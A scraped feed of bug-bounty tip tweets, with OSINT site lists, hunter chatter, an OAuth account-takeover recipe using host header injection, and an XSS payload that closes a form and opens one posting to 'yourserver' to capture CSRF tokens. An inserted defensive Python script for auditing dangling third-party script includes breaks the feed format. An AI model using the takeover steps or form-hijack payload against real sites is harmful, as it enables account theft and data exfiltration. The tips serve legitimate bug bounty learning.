-
Some #bugbounty hunters made over €50.000 in bug bounties with this simple trick. Thanks for the #BugBountyTip, @rez0__! pic.twitter.com/z9sPFJTNqV
-
Steps
0) Log in with Twitter
1) Host Header Injection [to a.cxx]
2) Generate OAuth Token's Link
3) Send link to Victim, after victim authorizes
4) Verifier sent to a.cxx
5) Reuse token
Account Takeover by @ngalongc #bugbountytips #bugbountytip https://hackerone.com/reports/317476 -
If you have an XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.
#bugbountytip #bugbountytips https://sametsahin.net/posts/steal-csrf-tokens-with-simple-xss/ … -
#OSINT :
Better Whois: http://www.betterwhois.com
Active Whois: http://www.johnru.com
ZabaSearch: http://www.zabasearch.com
TinEye: http://www.tineye.com
isearch: http://www.isearch.com/
serversniff: http://serversniff.net/
robtex: http://www.robtex.com
#BugBountyTip #Hacking #pentest -
#OSINT
DomainTools: http://www.domaintools.com
Active Whois: http://www.johnru.com
Domain Dossier: http://centralops.net
Network Solutions: http://www.networksolutions.com
DNSstuff: http://www.dnsstuff.com
DNS-Digger: http://dnsdigger.com
Shodan: http://www.shodan.io
#bugbountytip -
WooT! There is always a way. New #bugbounty #pentest short write up! Chain the bugs till you get what you want. #bugbountytip #bugbountytips #hacking Some steps were not mentioned. RT, Like and Comments are appreciated. For any pentest work DM me :) pic.twitter.com/nlAv4pMPhx
-
Look what I found on @LinkedIn
Have fun my friends, BUG OUT.
#CyberSecurity #Security #BugBountyTip #bugbountytips #Hackers #SecurityResearcher #TheCyberSecurityHub pic.twitter.com/8oCpnkRIly
-
My first bounty, after 25+ dups and 2 N/As. Got Hall of Fame in a few programs but never got paid. Thanks to all members of the bug bounty community. @Hacker0x01 A special thanks to @OffensiveHunter Sir & @abhinavbom Sir for the guidance. #bugbounty #bugbountytip #TogetherWeHitHarder pic.twitter.com/kKQQZ84Bba
-
#bugbountytip #bugbountytips Never underestimate the power of Google Dorking. Just found a defaced website for bugbounty program. pic.twitter.com/M3kEwoNDtI
-
Hey, has anyone here targeted AT&T? If AT&T marks my report as triaged, does that mean my report is accepted 100% or not? #BugBounty #bugbountytips #bugbountytip -
Next time add #BugBountyTip to your post to get maximum profit -
BLH - Broken Link Hijacking
Just suppose your site uses cool.c/Script.js
After a few years cool.c decided to close its services.
Now story begins
buys cool.c and then host Script.js
BOoOM
This happened to LinkedIn
READ BELOW
#bugbountytips #bugbountytip #bugbounty https://twitter.com/fatratfatrat/status/1222950920079626240 … -
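A defensive check for the broken link hijacking scenario in the tweet above, as an added example that is not part of any post in this feed: it audits a page's own HTML for third-party scripts whose host no longer resolves or whose content is not pinned with Subresource Integrity. The function names, the sample page and the hosts (`cool.example` stands in for the tweet's cool.c) are constructed for illustration.

```python
import socket
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptCollector(HTMLParser):
    """Collect (src, has_integrity) for every <script src=...> tag."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "script" and attr.get("src"):
            self.scripts.append((attr["src"], bool(attr.get("integrity"))))

def dns_resolves(host):
    """Live check: True if the host currently resolves."""
    try:
        socket.getaddrinfo(host, 443)
        return True
    except socket.gaierror:
        return False

def audit_external_scripts(html, own_host, resolves=dns_resolves):
    """Return (host, finding) pairs for risky third-party script includes."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, has_sri in collector.scripts:
        host = urlparse(src).hostname  # None for relative (first-party) URLs
        if host is None or host == own_host or host.endswith("." + own_host):
            continue
        if not resolves(host):
            # Host is gone: the domain may be open for someone else to register.
            findings.append((host, "dangling"))
        elif not has_sri:
            # Host is live but unpinned: a new owner could swap the script.
            findings.append((host, "no-sri"))
    return findings

# Constructed sample page and resolver data, so the example runs offline.
SAMPLE_HTML = """
<script src="/static/app.js"></script>
<script src="https://cool.example/Script.js"></script>
<script src="//cdn.example.net/lib.js"></script>
<script src="https://pinned.example.org/x.js" integrity="sha384-CONSTRUCTED"></script>
"""
LIVE_HOSTS = {"cdn.example.net", "pinned.example.org"}
```

Calling `audit_external_scripts(page_html, "your-site.example")` without the third argument uses real DNS; a "dangling" finding means the include should be removed or self-hosted, and a "no-sri" finding means an `integrity` attribute should be added.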
Thanks for the awesome shoutout in your video @InsiderPhD! #bugbountytips #bugbountytip -
Reflected XSS https://link.medium.com/j1cgHbZpq3 https://link.medium.com/q9eeokp2J3 https://link.medium.com/5zdO3gPEw3 https://link.medium.com/vwwEcNQEw3 https://link.medium.com/TH0sHaq2J3 https://link.medium.com/njXx6sq2J3 https://victoni.github.io/bug-hunting-xss-on-cookie-popup-warning … https://gauravnarwani.com/cookie-worth-a-fortune … https://link.medium.com/bx6lLPq2J3 https://link.medium.com/3khM76q2J3
#bugbounty #bugbountytip -
Any good external bug bounty program?
#bugbounty #bugbountytips #bugbountytip -
Do you know any labs (free or paid) to practice new CVEs online? Except @PentesterLab and pentesteracademy #bugbountytips #bugbounty #bugbountytip -
Install Python. Open yourself up to a world of open-source bug bounty tools. Don't put it off, because it will enrich your skills.
#BugBounty #bugbountytips #BugBountyTip #infosec #infosecurity -
Button disabled? Inspect Element -> change from "disabled" to "enabled" -> Button enabled and action performed
#BugBountyTip

-
An Interesting Account Takeover:
#infosec #bugbountytips #BugBountyTip #hackerone #bugcrowd Credits: @fatratfatrat
pic.twitter.com/fPCoT5hV5W
-
Thanks @traceableai for providing API testing resources (tips). There isn't much info about API testing, but your tips and this blog post are awesome to learn API testing #bugbountytips #bugbountytip #bugbounty https://twitter.com/traceableai/status/1221704507953840128 …